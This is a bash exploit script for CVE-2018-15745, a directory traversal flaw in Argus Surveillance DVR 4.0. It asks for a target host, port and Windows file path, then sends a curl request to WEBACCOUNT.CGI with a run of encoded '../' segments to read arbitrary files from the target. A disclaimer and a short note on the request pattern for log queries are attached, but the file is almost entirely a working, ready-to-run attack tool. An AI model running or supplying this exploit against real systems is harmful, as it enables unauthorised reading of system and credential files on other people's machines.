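#!/usr/bin/bash
# Argus Surveillance DVR 4.0.0.0 - Directory Traversal Exploit
# Exploit taken from here: https://www.exploit-db.com/exploits/45296
# Works for DVR 4.0 on Windows OS
# CVE: 2018-15745
#
### Disclaimer
# This project is intended for **educational and research purposes only**.
# Use of this code for attacking targets without prior mutual consent is **illegal**.
# The author(s) assume **no responsibility** for any misuse or damage caused by this code.
# You are solely responsible for your actions.
# Always get proper authorization before conducting any security testing.
#
# Usage: chmod +x exploit.sh
#        ./exploit.sh
#
# What the script sends (useful when writing log queries or proxy rules):
#   GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=<prefix><encoded path>&USEREDIRECT=1&...
# The RESULTPAGE parameter carries a run of "..%2F" segments followed by the
# percent-encoded file path. A RESULTPAGE value containing "..%2F" (or "../"
# once decoded) in requests to WEBACCOUNT.CGI is the pattern to look for in
# the DVR's web traffic.

# Run of parent-directory segments placed in front of the requested path.
readonly TRAVERSAL_PREFIX="..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F"

#######################################
# Percent-encode a string for use inside a URL query value.
# Letters, digits, '.', '_' and '-' pass through; every other character is
# written as '%' followed by its character code in upper-case hex.
# The original listing spelled out one case arm per ASCII symbol (credited
# there to Google Generative AI); each arm produced the same value as this
# printf fallback, and the arms for '-', '.' and '_' could never match
# because the pass-through pattern came first.
# Arguments: $1 - string to encode
# Outputs:   encoded string on stdout (no trailing newline)
#######################################
url_encode_path() {
  local input=$1
  local encoded="" ch esc i
  for (( i = 0; i < ${#input}; i++ )); do
    ch=${input:i:1}
    case "$ch" in
      [a-zA-Z0-9._-]) esc=$ch ;;
      # A leading quote makes printf use the character's numeric code.
      *) printf -v esc '%%%02X' "'$ch" ;;
    esac
    encoded+=$esc
  done
  printf '%s' "$encoded"
}

#######################################
# Drop the three-character drive prefix (e.g. "C:\") and turn backslashes
# into forward slashes.
# The original removed the first three characters unconditionally, which
# silently mangled any input that did not start with a drive prefix.
# Arguments: $1 - Windows-style path
# Outputs:   drive-relative path with '/' separators on stdout
# Returns:   1 when $1 does not start with <letter>:<slash or backslash>
#######################################
strip_drive_prefix() {
  local path=$1
  local drive_re='^[A-Za-z]:[\\/]'
  [[ $path =~ $drive_re ]] || return 1
  path=${path:3}
  printf '%s' "${path//\\//}"
}

#######################################
# Check that a port is a decimal number in 1..65535.
# Arguments: $1 - port as typed
# Returns:   0 when valid, 1 otherwise
#######################################
is_valid_port() {
  local port_re='^[0-9]{1,5}$'
  [[ $1 =~ $port_re ]] || return 1
  # 10# forces base 10 so a leading zero is not read as octal.
  (( 10#$1 >= 1 && 10#$1 <= 65535 ))
}

#######################################
# Reject a host value that is empty or contains whitespace or URL
# delimiters; the value is interpolated into the request URL as typed.
# Arguments: $1 - host as typed
# Returns:   0 when acceptable, 1 otherwise
#######################################
is_plausible_host() {
  case "$1" in
    '' | *[[:space:]/?#@]*) return 1 ;;
  esac
  return 0
}

#######################################
# Prompt for host, port and file paths, issuing one request per path until
# an empty line (or end of input) is read.
# Outputs: prompts and curl output on stdout, validation errors on stderr
# Returns: 0 normally, 1 when host or port fail validation
#######################################
main() {
  local host="" port="" requested relative encoded

  printf '%s\n' " ▄▖ ▄▖ ▘▜ ▜ ▄ ▖▖▄▖▖▖ ▌▌▛▘▛▌▌▌▛▘ ▚ ▌▌▛▘▌▌█▌▌▐ ▐ ▀▌▛▌▛▘█▌ ▌▌▌▌▙▘▙▌ ▛▌▌ ▙▌▙▌▄▌ ▄▌▙▌▌ ▚▘▙▖▌▐▖▐▖█▌▌▌▙▖▙▖ ▙▘▚▘▌▌ ▌ ▄▌ "

  # read -r keeps backslashes literal; end of input ends the run quietly.
  printf '%s\n' "Enter Target-Host IP Address"
  read -r host || return 0
  printf '%s\n' "Enter Target-Host Port: "
  read -r port || return 0

  if ! is_plausible_host "$host"; then
    printf 'Invalid host: %s\n' "$host" >&2
    return 1
  fi
  if ! is_valid_port "$port"; then
    printf 'Invalid port: %s\n' "$port" >&2
    return 1
  fi

  while :; do
    printf '%s\n' 'Enter the Directory (e.g. C:\Windows\system.ini): '
    requested=""
    # Status deliberately unchecked: at end of input the variable is empty
    # and the test below leaves the loop, as an empty line does.
    read -r requested
    [[ -n $requested ]] || break

    if ! relative=$(strip_drive_prefix "$requested"); then
      printf 'Expected a path starting with a drive prefix such as C:\\ - got: %s\n' "$requested" >&2
      continue
    fi
    encoded=$(url_encode_path "$relative")

    # Sending GET request
    curl "http://${host}:${port}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=${TRAVERSAL_PREFIX}${encoded}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
    printf '\n'
  done
  return 0
}

main "$@"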